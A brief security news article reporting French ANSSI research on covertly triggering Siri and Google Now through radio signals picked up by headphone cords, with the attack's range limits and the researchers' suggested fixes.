Attackers can use Siri, Google Now to secretly take over smartphones

A team of researchers from the French Network and Information Security Agency (ANSSI) has devised a way to covertly exploit the Siri and Google Now voice activated personal assistants in order to make the target’s smartphone send messages and emails, visit potentially malicious sites, make pricey phone calls or even become an eavesdropping device.

For the attack to be successful, the devices must have headphones with a microphone plugged in, and the attacker must be within close range of it, but doesn’t have to have immediate physical access to the device.

The attack works like this: the headphones’ cord functions as an antenna, and the wire converts electromagnetic waves sent by the attackers into electrical signals, which the OS interprets as voice commands coming via the microphone.

On the attackers’ part the setup includes a laptop running GNU Radio, a USRP software-defined radio, an amplifier, and an antenna.

The whole setup can fit into a backpack, allowing the attacker to get close enough (some six and a half feet) to the target in a situation where crowds are normal (airport, commuting with public methods of transportation, etc.). The researchers told Andy Greenberg that an increased attack range (up to 16 feet) is possible, but also that the attack setup would be much, much larger, and therefore more unwieldy.

Such an attack would, of course, be noticed by the targets if they are fiddling with their phone at that exact moment. Also, for the attack to be successful it’s best that the phones are unlocked (although on newer iPhones Siri can be enabled from the lock screen, so that particular requirement is not necessary).

The researchers have advised Apple and Google on how to fix this particular attack vector (voice recognition, custom “wake” words for the personal assistant, better shielded headphone cords), but have also concluded that making it possible for individuals other than the legitimate phone owners to bypass PIN locks with voice commands is generally a bad idea.

Don't miss